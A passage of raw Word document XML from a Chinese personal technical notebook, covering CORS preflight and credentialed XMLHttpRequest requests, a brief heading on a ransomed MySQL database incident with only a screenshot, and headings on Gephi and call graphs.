          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的代码使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求发送一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求体，该请求包含了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>非标准的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP X-PINGOTHER </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请求标头</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这样的请求标头并</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的一部分，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但通常对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用很有用处。另外，该请求的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> application/xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，且使用了自定义的请求标头</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC05A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以该请求需要首先发起“预检请求”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C3E17" w14:textId="77777777" w:rsidR="00B7512D" w:rsidRDefault="00B7512D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9B55F2" w14:textId="77777777" w:rsidR="007455A1" w:rsidRDefault="007455A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BECD2FD" w14:textId="77777777" w:rsidR="007455A1" w:rsidRDefault="007455A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F3E156" w14:textId="3B7A504E" w:rsidR="00B7512D" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc159779486"/>
      <w:r w:rsidRPr="00122375">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>附带身份凭证的请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="18AC833C" w14:textId="34586EBB" w:rsidR="007455A1" w:rsidRDefault="007455A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007455A1">
        <w:t>Access-Control-Allow-Credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23967509" w14:textId="77777777" w:rsidR="007455A1" w:rsidRDefault="007455A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571B5836" w14:textId="77777777" w:rsidR="007455A1" w:rsidRPr="007455A1" w:rsidRDefault="007455A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FDC1B9" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XMLHttpRequest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fetch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一个有趣的特性是，可以基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP cookies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证信息发送身份凭证。一般而言，对于跨源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XMLHttpRequest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fetch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，浏览器不会发送身份凭证信息。如果要发送凭证信息，需要设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XMLHttpRequest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的某个特殊标志位，或在构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象时设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD868A" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1F15AD" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本例中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">https://foo.example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的某脚本向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://bar.other </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，并设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo.example </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可能包含这样的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F7ADE" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40697B81" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const invocation = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B3CA13" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const url = "https://bar.other/resources/credentialed-content/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715BF5F1" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF723D8" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>function callOtherDomain() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77271B10" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (invocation) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32462FEC" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    invocation.open("GET", url, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A934FE" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    invocation.withCredentials = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B62E051" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    invocation.onreadystatechange = handler;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4480C9" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    invocation.send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D4E27" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7BEB4F" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF17EE" w14:textId="77777777" w:rsidR="00122375" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Copy to Clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63523AD0" w14:textId="5845E452" w:rsidR="00B7512D" w:rsidRDefault="00122375" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> XMLHttpRequest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> withCredentials </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从而向服务器发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因为这是一个简单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，所以浏览器不会对其发起“预检请求”。但是，如果服务器端的响应中未携带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access-Control-Allow-Credentials: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，浏览器将不会把响应内容返回给请求的发送者。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA1CB7" w14:textId="77777777" w:rsidR="00B7512D" w:rsidRDefault="00B7512D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049E32C3" w14:textId="77777777" w:rsidR="00EA5A2A" w:rsidRDefault="00EA5A2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54013314" w14:textId="3E13B860" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全应急事件</w:t>
      </w:r>
      <w:r w:rsidR="0002525A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0002525A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidR="0002525A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被勒索</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E931D14" w14:textId="7C516647" w:rsidR="00D83B5F" w:rsidRDefault="001B5DC5" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日，我和其他前端同事合作开发的考试系统，数据库被黑宕机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF38BF" w14:textId="61B6C5D9" w:rsidR="00D83B5F" w:rsidRDefault="001B5DC5" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001B5DC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0044EE77" wp14:editId="092C2B31">
            <wp:extent cx="5274310" cy="2717165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1035150470" name="图片 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50470" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>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717165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C0BEDF" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71672F6D" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E934E34" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142BE00F" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723F57A5" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031237A0" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CECB124" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F549EE0" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5FDE66" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E3E5E5" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F738F7" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68512D1A" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3C2254" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56FDA8DC" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="00D83B5F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED7E5FE" w14:textId="77777777" w:rsidR="00D83B5F" w:rsidRDefault="00D83B5F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782C974F" w14:textId="062AAB65" w:rsidR="00443C37" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc159779487"/>
      <w:r>
        <w:t>数据统计软件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="7C835212" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC97D50" w14:textId="666A251A" w:rsidR="005B411A" w:rsidRDefault="00034C59" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc159779488"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>ephi</w:t>
      </w:r>
      <w:r w:rsidR="003B45A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：图</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="588DA3D1" w14:textId="77777777" w:rsidR="00C51CF3" w:rsidRDefault="00C51CF3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEFE1B1" w14:textId="43AA0663" w:rsidR="00C51CF3" w:rsidRDefault="00C51CF3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3035441D" w14:textId="44D62663" w:rsidR="00C51CF3" w:rsidRDefault="00C51CF3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C51CF3">
        <w:t>https://gephi.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352887D3" w14:textId="77777777" w:rsidR="00C51CF3" w:rsidRDefault="00C51CF3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5B26EE" w14:textId="13B22B01" w:rsidR="00514510" w:rsidRPr="00514510" w:rsidRDefault="00514510" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D96931" w14:textId="1F577EA0" w:rsidR="005B411A" w:rsidRDefault="00514510" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00514510">
        <w:t>https://www.bilibili.com/video/BV1dL4y1H76g/?spm_id_from=333.1007.top_right_bar_window_history.content.click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A52B7B" w14:textId="77777777" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1081EDBF" w14:textId="1DFEE64B" w:rsidR="005B411A" w:rsidRDefault="005B411A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638A669E" w14:textId="7E2ECB7C" w:rsidR="005B411A" w:rsidRDefault="00A140D2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc159779489"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> graph</w:t>
      </w:r>
      <w:r w:rsidR="00017D36">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00017D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数调用图</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="4F8F9802" w14:textId="78EE8035" w:rsidR="005B411A" w:rsidRDefault="00433792" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
